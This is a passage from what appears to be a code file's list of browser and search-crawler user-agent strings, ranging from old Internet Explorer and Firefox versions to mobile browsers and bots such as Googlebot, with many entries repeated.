'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
